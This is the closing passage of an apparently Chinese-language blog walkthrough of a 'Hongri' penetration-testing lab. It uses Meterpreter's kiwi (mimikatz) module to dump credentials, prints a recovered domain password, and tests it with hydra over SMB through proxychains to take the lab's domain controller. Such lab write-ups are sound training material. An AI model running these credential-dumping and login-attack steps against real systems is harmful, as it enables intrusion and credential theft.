<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317202907-by5hbje.png" alt="image"></p>
<p>这里可以加载 mimikatz</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">load kiwi
creds_wdigest
creds_all</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317203345-8uqmqg2.png" alt="image"></p>
<p>这里成功抓到一个密码，这个 test 就是当前域环境，尝试一下是不是密码 <code>zxcASDqw123!!</code></p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">proxychains4 hydra -l administrator -p &#39;zxcASDqw123!!&#39; smb:&#x2F;&#x2F;192.168.93.10</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317204210-586p8tb.png" alt="image"></p>
<p>这样就成功拿下最后的域控机器了</p>
<p>‍</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Marin</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://wwwmarin.xyz/2026/03/23/hong-ri-ba-chang-3/">https://wwwmarin.xyz/2026/03/23/hong-ri-ba-chang-3/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Marin</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
                                    <span class="chip bg-color">内网渗透</span>
                                </a>
                            
                                <a href="/tags/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/">
                                    <span class="chip bg-color">红日靶场系列</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2026/03/23/hong-ri-ba-chang-4/">
                    <div class="card-image">
                        
                        <img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/dauisgdascuigsgciua.jpg" class="responsive-img" alt="红日靶场 4">
                        
                        <span class="card-title">红日靶场 4</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2026-03-23
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E6%B8%97%E9%80%8F/" class="post-category">
                                    渗透
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
                        <span class="chip bg-color">内网渗透</span>
                    </a>
                    
                    <a href="/tags/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/">
                        <span class="chip bg-color">红日靶场系列</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2026/03/23/hong-ri-ba-chang-5/">
                    <div class="card-image">
                        
                        <img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20240819_015830.jpg" class="responsive-img" alt="红日靶场 4">
                        
                        <span class="card-title">红日靶场 4</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2026-03-23
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E6%B8%97%E9%80%8F/" class="post-category">
                                    渗透
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
                        <span class="chip bg-color">内网渗透</span>
                    </a>
                    
                    <a href="/tags/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/">
                        <span class="chip bg-color">红日靶场系列</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>


  <!-- 是否加载使用自带的 prismjs. -->
  <script type="text/javascript" src="/libs/prism/prism.min.js"></script>


<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4, h5, h6'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2026</span>
            
            <a href="/about" target="_blank">Marin</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">














</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 白天和黑夜主题 -->
<div class="stars-con">
    <div id="stars"></div>
    <div id="stars2"></div>
    <div id="stars3"></div>  
</div>

<script>
    function switchNightMode() {
        $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
        setTimeout(function () {
            $('body').hasClass('DarkMode') 
            ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
            : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
            
            setTimeout(function () {
            $('.Cuteen_DarkSky').fadeOut(1e3, function () {
                $(this).remove()
            })
            }, 2e3)
        })
    }
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    
    
    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
